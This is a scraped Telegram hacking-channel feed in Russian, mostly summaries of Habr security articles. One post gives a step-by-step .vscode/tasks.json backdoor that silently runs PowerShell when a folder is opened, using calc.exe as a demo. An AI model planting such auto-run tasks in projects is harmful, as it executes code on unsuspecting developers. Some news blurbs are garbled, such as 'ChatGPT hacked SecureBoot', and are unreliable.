Хакер_BE1
Open in Telegram
Канал по хакингу, полезный и интересный контент для всех уровней. По вопросам сотрудничества @cyberJohnny
Show more189
Subscribers
No data24 hours
No data7 days
-930 days
Posts Archive
189
Йошуа Бенжио, один из основоположников искусственного интеллекта и лауреат премии Тьюринга, выразил серьезные опасения по поводу современных моделей ИИ. Он утверждает, что новейшие системы демонстрируют опасные тенденции, такие как склонность к обману и мошенничеству. В ответ на эти вызовы Бенжио основал некоммерческую организацию LawZero, цель которой — создать безопасные и надежные ИИ-системы.
Обсуждение рисков, связанных с большими языковыми моделями (LLM), требует внимательного анализа. Важно понять, какие угрозы они могут представлять и как можно минимизировать эти риски.
Для более подробной информации читайте по ссылке: [Читать далее](https://habr.com/ru/articles/918394/?utm_campaign=918394&utm_source=habrahabr&utm_medium=rss#habracut)
Подписывайтесь на мой канал @hacker_be1 для актуальных новостей в области информационной безопасности! #информационнаябезопасность #ИИ #машинноеобучение
189
📢 На этой неделе в мире кибербезопасности произошло несколько заметных событий.
🚀 Павел Дуров дал второе интервью Такеру Карлсону, в котором обсудил актуальные вопросы безопасности и конфиденциальности в сети. Это ещё раз подчеркивает важность защиты личных данных.
💻 Также были обнаружены уязвимости в ChatGPT, который взломал SecureBoot. Это событие ставит под сомнение безопасность загрузки системы и показывает, насколько важна защита на этапе старта.
🔧 Linux Foundation переизобрела дистрибьюцию плагинов для WordPress, что может повлиять на разработчиков и пользователей платформы, улучшая управление плагинами и их безопасность.
📄 Подробнее об этим событиях можно узнать по ссылке: [Читать далее](https://habr.com/ru/articles/917666/?utm_campaign=917666&utm_source=habrahabr&utm_medium=rss#habracut)
#кибербезопасность #информационнаябезопасность #новости
Подписывайтесь на мой канал @hacker_be1 для свежих новостей!
189
🌐 Судьба будущего интернета под угрозой: станет ли он открытым пространством для всех или закроется в рамках контролируемых Big Tech экосистем?
🚀 По данным Fast Company и других ресурсов, ChatGPT набирает популярность с невероятной скоростью. Всего за пару часов к платформе подключается до 1 000 000 пользователей.
👉 Узнайте больше об этой важной теме и её влиянии на цифровое пространство. [Читать далее](https://habr.com/ru/articles/917796/?utm_campaign=917796&utm_source=habrahabr&utm_medium=rss#habracut)
#интернет #BigTech #ChatGPT #информатика #технологии
Подписывайтесь на мой канал @hacker_be1, чтобы быть в курсе последних новостей в сфере информационной безопасности!
189
Несколько месяцев назад был проведён интересный эксперимент: отключив JavaScript в браузере, проверили, сохраняются ли сервисы Google, которые функционируют без него.
Результаты оказались неожиданными – форма восстановления имени пользователя продолжала работать, несмотря на отсутствие JS. Это открывает множество вопросов о том, как современные веб-сервисы могут оставаться доступными для пользователей с различными настройками браузера.
Если хотите подробнее узнать об этом эксперименте и его выводах, переходите по ссылке: [Читать далее](https://habr.com/ru/articles/918414/?utm_campaign=918414&utm_source=habrahabr&utm_medium=rss#habracut)
Подписывайтесь на мой канал для актуальных новостей в сфере информационной безопасности: @hacker_be1
#информационнаябезопасность #JavaScript #Google
189
🚀 За последний год искусственный интеллект стал неотъемлемой частью нашей жизни. Он встраивается в различные приложения и сервисы, часто работающие в фоне, и взаимодействует с пользователем незаметно.
🤔 Это поднимает важный вопрос: **Что происходит с твоими данными?** В условиях, когда AI анализирует и обрабатывает информацию, важно понимать, какие данные используются и как они хранятся.
📊 Следите за трендами в области информационной безопасности и защиты личной информации. Узнайте больше об этой теме по ссылке: [Читать далее](https://habr.com/ru/articles/918396/?utm_campaign=918396&utm_source=habrahabr&utm_medium=rss#habracut)
🔒 Подписывайтесь на мой канал @hacker_be1 для актуальных новостей из мира кибербезопасности! #информационнаябезопасность #AI #данные
189
🔒 Киберугрозы продолжают расти, а уязвимости в коде стоят компании миллионы. Каждый день новые атаки подтверждают, что игнорирование безопасности на этапе разработки — это провал.
📊 Статистика от OWASP и NIST показывает, что 97% приложений содержат уязвимости. Исправление этих ошибок после релиза обходится в 6 раз дороже, чем профилактические меры.
🔧 DevSecOps меняет правила игры, объединяя команды разработки и безопасности. Интеграция в CI/CD и автоматизация проверок помогают преодолеть барьеры и делают защиту данных частью повседневной работы.
👥 Но успех зависит не только от инструментов, а от культуры. Руководство должно создать среду, где безопасность становится общей ответственностью.
💡 Узнайте о вызовах и путях их преодоления, чтобы ваша команда была готова к цифровым угрозам будущего!
👉 Читайте подробнее: [Читать далее](https://habr.com/ru/articles/918350/?utm_campaign=918350&utm_source=habrahabr&utm_medium=rss#habracut)
@hacker_be1 #DevSecOps #ИнформационнаяБезопасность #Киберугрозы
189
Генеративные большие языковые модели (LLM), такие как ChatGPT и YandexGPT, стали важной частью множества сервисов. Однако с ростом их популярности возникли новые угрозы безопасности, и одной из самых актуальных проблем являются промпт-инъекции.
Промпт-инъекции представляют собой техники, позволяющие злоумышленникам манипулировать реакциями моделей, что может привести к нежелательным последствиям. Понимание этих угроз жизненно важно для обеспечения безопасности использования LLM в различных приложениях.
Для подробного анализа и рекомендаций по защите от промпт-инъекций читайте статью по ссылке: [Читать далее](https://habr.com/ru/articles/918320/?utm_campaign=918320&utm_source=habrahabr&utm_medium=rss#habracut)
#информационнаябезопасность #hacking #AI #LLM @hacker_be1
189
📱 В последние годы наблюдается рост интереса к вопросам конфиденциальности и защиты данных. Технологии, позволяющие следить за пользователями, становятся все более изощренными.
Часто мы не осознаем, что наши устройства могут стать "стеклянными домами", которые открывают доступ к нашей личной информации. Многие компании используют данные пользователей для своих целей, выставляя их на всеобщее обозрение.
Важно понимать, что каждая информация, которую мы оставляем в сети, может быть использована против нас. Поэтому стоит уделять внимание вопросам безопасности и защищенности своих данных.
🔗 Подробности по ссылке: [Читать далее](https://habr.com/ru/articles/918272/?utm_campaign=918272&utm_source=habrahabr&utm_medium=rss#habracut)
#информационнаябезопасность #конфиденциальность #данные
👉 Подписывайтесь на мой канал @hacker_be1!
189
🔒 Важно помнить о принципах нулевой доверия (Zero Trust) в области информационной безопасности. Основная идея заключается в том, что доступ к администраторским интерфейсам возможен только при наличии сертификата, который хранится в защищенном хранилище на устройстве.
Это значительно снижает поверхность атаки, ограничивая уязвимости до конечных устройств и межмашинных взаимодействий. Таким образом, для злоумышленника доступ к админке становится критически зависимым от попытки взлома компьютера сотрудника.
Наша основная задача — предотвратить это. Не позволяйте хакерам получить доступ к вашим данным!
🔗 [Читать далее](https://habr.com/ru/articles/918246/?utm_campaign=918246&utm_source=habrahabr&utm_medium=rss#habracut)
@hacker_be1 #информационнаябезопасность #ZeroTrust #админка
189
💻 Здравствуйте, читатели!
Сегодня поговорим о серьезной уязвимости, найденной в UEFI-совместимых прошивках на базе платформы Insyde H2O, которую автор назвал Hydroph0bia. В первой статье мы обсудили проблему "затенения" волатильных переменных NVRAM неволатильными и возможные катастрофические последствия.
Важно помнить, что информация, содержащаяся в статье, представлена исключительно в образовательных целях. Не используйте ее для совершения противоправных действий. Подробнее ознакомиться с материалом можно по ссылке: [Читать далее](https://habr.com/ru/articles/918192/?utm_campaign=918192&utm_source=habrahabr&utm_medium=rss#habracut).
Подписывайтесь на мой канал для свежих новостей в мире информационной безопасности: @hacker_be1
#информационнаябезопасность #киберугроза #хакеры
189
Напоминание об этическом хакинге
NoSQL-инъекция в MongoDB
через несанированный фильтр запросов
@hacker_be1
189
📰 В последние полгода исследователи из разных лабораторий по всему миру пытаются решить ключевую задачу — сделать искусственный интеллект безопасным. Это приводит к различным подходам и методам, которые выглядят как творчество.
🎶 Я посетил исследовательский центр Microsoft, где команда PyRIT разработала концепцию "композиционной безопасности". Ведущий разработчик сравнил безопасность с симфонией, где каждый элемент играет свою роль и взаимодействует с другими для достижения общей цели.
🔍 Их система создает многоходовые атаки с глубоким анализом, основанным на взаимодействии языковых моделей. Это не просто технология, а искусство, требующее понимания работы ИИ.
👉 Более подробную информацию читайте по ссылке: [Читать далее](https://habr.com/ru/articles/918094/?utm_campaign=918094&utm_source=habrahabr&utm_medium=rss#habracut)
#ИскусственныйИнтеллект #Безопасность #PyRIT #Microsoft @hacker_be1
189
Спецслужбы продолжают искать обходные пути для преодоления современных систем безопасности. Они подменяют генераторы случайности, подслушивают сигналы ноутбуков и даже используют ICMP-пакеты для вывода ключей.
Новая статья передает мозаичную картину атак, от математических уязвимостей до физических побочных каналов. Она поднимает важный вопрос: настолько ли надежна наша защита и существует ли абсолютная безопасность?
Если вы уверены в неприступности своего щита, возможно, стоит перепроверить его на прочность. Подробности в статье по ссылке: [Читать далее](https://habr.com/ru/articles/918068/?utm_campaign=918068&utm_source=habrahabr&utm_medium=rss#habracut)
@hacker_be1 #информационнаябезопасность #киберугроза #хакеры
189
🔒 Всем привет! Антон на связи, я Tech Lead DevSecOps в крупной компании. Часто слышу непонимание о роли DevSecOps и о том, что конкретно они автоматизируют.
Многие коллеги из DevOps считают, что добавление инструментов, таких как Trivy или SonarQube, делает их DevSecOps. Однако настоящая суть этой роли глубже и требует более зрелого подхода к безопасности в пайплайнах.
В этой статье мы обсудим, как должен выглядеть эффективный DevSecOps пайплайн и что такое Security Gate. Погрузитесь в детали, чтобы понять настоящую ценность этой практики!
👉 [Читать далее](https://habr.com/ru/articles/917970/?utm_campaign=917970&utm_source=habrahabr&utm_medium=rss#habracut)
#DevSecOps #ИнформационнаяБезопасность #Код #SecurityGate @hacker_be1
189
🔒 VSCode-Backdoor: внедрение бэкдора через .vscode/tasks.json
VSCode позволяет автоматически выполнять задачи через файл tasks.json. Злоумышленник может воспользоваться этим, чтобы внедрить скрытый бэкдор, запускающий произвольный код при открытии папки в VSCode.
Техника внедрения
1. Создайте директорию .vscode в корне проекта (если она ещё не существует).
2. Добавьте файл tasks.json со следующим содержимым:
{
"version": "2.0.0",
"tasks": [
{
"label": "VS",
"type": "shell",
"command": "powershell",
"args": [
"-WindowStyle", "Hidden",
"-Command",
"Start-Process calc.exe"
],
"problemMatcher": [],
"group": {
"kind": "build",
"isDefault": true
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"echo": false,
"reveal": "never",
"focus": false,
"panel": "dedicated"
}
}
]
}
В этом примере при открытии папки в VSCode скрытно запускается calc.exe.
https://github.com/SaadAhla/VSCode-Backdoor
@hacker_be1
189
🚨 Вероятность блокировки Telegram и WhatsApp возрастает!
10 июня Госдума приняла закон о создании российского национального мессенджера. Это событие вызывает бурные обсуждения среди пользователей и специалистов в области информационной безопасности.
Мы собрали топ корпоративных мессенджеров, которые могут стать достойной заменой WhatsApp и Telegram. Будьте в курсе и выбирайте безопасные альтернативы!
📲 [Читать далее](https://habr.com/ru/articles/917498/?utm_campaign=917498&utm_source=habrahabr&utm_medium=rss#habracut)
#информационнаябезопасность #мессенджеры #новости #госдума @hacker_be1
189
В современном мире объемы данных растут с невероятной скоростью. Компании ежедневно обрабатывают огромные массивы информации, включая персональные данные, финансовую информацию и конфиденциальные документы.
С ростом объемов информации защита данных становится всё более сложной задачей. Традиционные методы обнаружения и классификации данных, такие как регулярные выражения, часто оказываются недостаточными для реальных сценариев и не справляются с новым контекстом.
На помощь приходит машинное обучение, которое позволяет автоматизировать процесс классификации и учитывать различные источники данных. В нашей статье мы расскажем о применении ML в модуле поиска и классификации чувствительных данных в PT Data Security.
Читать подробнее: [https://habr.com/ru/articles/908556/?utm_campaign=908556&utm_source=habrahabr&utm_medium=rss#habracut](https://habr.com/ru/articles/908556/?utm_campaign=908556&utm_source=habrahabr&utm_medium=rss#habracut)
#информационнаябезопасность #машиннообучение #защита данных @hacker_be1
189
Firefox остается последним независимым браузером на собственном движке и активно противостоит монополии Chrome. Однако политика Mozilla вызывает недовольство у пользователей из-за сбора телеметрии, возможного внедрения ИИ и использования личных данных.
В этой ситуации стоит рассмотреть безопасные форки Firefox, хотя это может лишить вас ряда удобных централизованных сервисов, таких как синхронизация между устройствами.
Тем не менее, проблему синхронизации можно решить. Вы можете установить сервер синхронизации Firefox на собственном хостинге, что обеспечит большую безопасность.
👉 Читайте подробнее: [habr.com](https://habr.com/ru/articles/917308/?utm_campaign=917308&utm_source=habrahabr&utm_medium=rss#habracut)
#Firefox #Безопасность #Информация #Технологии #Mozilla @hacker_be1
189
🔒 В современном подходе к безопасности — Zero Trust Network Access (ZTNA) — ключевым является принцип «никогда не доверяй, всегда проверяй». Каждый запрос на доступ проходит обязательную аутентификацию и авторизацию, что значительно увеличивает уровень защиты.
Значения ZTNA на базе SPIFFE/SPIRE и OpenID Connect (OIDC) впечатляют: ускорение процедуры аутентификации в 20–80 раз и повышение производительности на 46–64%. В облаках AWS и Google Cloud задержки снижаются до 50–100 мс, что является значительным улучшением по сравнению с классическими VPN.
Подробнее о внедрении ZTNA читайте в нашем обзоре: [Читать далее](https://habr.com/ru/articles/917440/?utm_campaign=917440&utm_source=habrahabr&utm_medium=rss#habracut)
#ZeroTrust #ZTNA #SPIFFE #OIDC #ИнформационнаяБезопасность
Подписывайтесь на канал @hacker_be1 для свежих новостей!
189
📢 Внимание! Выбор безопасного мессенджера становится важной задачей в мире информационной безопасности.
Недавно директор филиала поделился со мной обеспокоенностью о конфиденциальности переписки с генеральным директором через сервис mail.ru. Анализ показал, что любые легальные мессенджеры, использующие шифрование и аутентификацию, должны иметь лицензию ФСБ и предоставлять ключи доступа к переписке.
На основании полученных данных, я выделил критерии идеального защищенного мессенджера: абсолютная криптостойкость, надежная передача ключей, альтернативная аутентификация, отсутствие серверов и хранения истории переписки.
Интересно, что минимум информации о шифре Вернама делает его менее известным, хотя именно он может помочь в создании надежной системы.
🔗 Читайте больше: https://habr.com/ru/articles/917428/?utm_campaign=917428&utm_source=habrahabr&utm_medium=rss#habracut
Подписывайтесь на канал @hacker_be1 для новостей в мире информационной безопасности! #информационнаябезопасность #шифрование #мессенджеры
